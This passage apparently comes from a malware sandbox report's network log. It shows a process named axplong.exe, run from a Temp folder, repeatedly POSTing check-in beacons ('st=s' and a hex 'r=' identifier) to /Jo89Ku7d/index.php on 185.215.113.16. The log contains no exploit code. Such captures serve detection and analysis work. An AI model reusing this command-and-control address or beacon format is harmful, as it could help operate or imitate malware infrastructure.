                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:21.210613012 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  15 | 192.168.2.4 | 49752 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:21.319447041 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:22.018805981 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:22.021414995 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:22.249141932 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  16 | 192.168.2.4 | 49753 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:22.366337061 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:23.088722944 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:23.089634895 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:23.324312925 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  17 | 192.168.2.4 | 49754 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:23.621750116 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:24.320278883 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:24.321151018 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:24.558545113 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  18 | 192.168.2.4 | 49755 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:24.679474115 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:25.372248888 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:25.373226881 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:25.596723080 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  19 | 192.168.2.4 | 49756 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:25.711108923 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:26.401568890 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:26.403621912 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:26.628310919 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  20 | 192.168.2.4 | 49757 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:26.742043972 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:27.479156971 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:27.480864048 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:27.704467058 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  21 | 192.168.2.4 | 49758 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:27.820770025 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:28.522046089 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:28.529462099 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:28.757508039 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  22 | 192.168.2.4 | 49759 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:28.891541004 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:29.599926949 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:29.601567984 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:29.830955982 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  23 | 192.168.2.4 | 49760 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:29.948928118 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:30.647969961 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:30.648828983 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:30.876790047 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  24 | 192.168.2.4 | 49761 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:30.991504908 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:31.710169077 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:31.740235090 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:31.969443083 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  25 | 192.168.2.4 | 49762 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:32.100945950 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:32.800465107 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:32.801619053 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:33.030148029 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  26 | 192.168.2.4 | 49763 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:33.152729034 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:33.843264103 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:33.844074965 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:34.071610928 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  27 | 192.168.2.4 | 49764 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:34.179425001 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:34.889616013 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:34.890603065 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:35.118401051 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  28 | 192.168.2.4 | 49765 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:35.226705074 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:35.923831940 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:35 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:35.928114891 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:36.154902935 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  29 | 192.168.2.4 | 49766 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:36.272689104 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:36.979429007 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
